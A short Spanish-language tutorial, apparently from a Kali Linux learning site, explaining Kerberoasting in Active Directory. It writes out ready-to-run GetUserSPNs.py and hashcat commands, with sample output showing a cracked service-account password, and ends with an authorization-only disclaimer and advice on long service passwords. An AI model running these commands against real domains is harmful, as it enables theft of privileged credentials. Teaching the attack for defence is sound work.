KALI
Active Directory: Kerberoasting
En un dominio Windows, cualquier usuario autenticado puede pedir tickets de servicio de las cuentas de servicio, y esos tickets van cifrados con la contraseña de la cuenta.
Ese es el Kerberoasting: pides los tickets con GetUserSPNs, y luego los crackeas offline con hashcat. Si una cuenta de servicio tiene contraseña débil, cae, y suelen tener privilegios altos.
Por eso las cuentas de servicio necesitan contraseñas larguísimas.
# los comandos
kali@kali:~$ GetUserSPNs.py empresa.com/jperez:Pass123 -requestcopiar$krb5tgs$23$*sql-svc*$EMPRESA... (hash del ticket)
kali@kali:~$ hashcat -m 13100 tickets.txt rockyou.txtcopiar$krb5tgs$23$...:Verano2026
Status: Cracked -> sql-svc:Verano2026
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.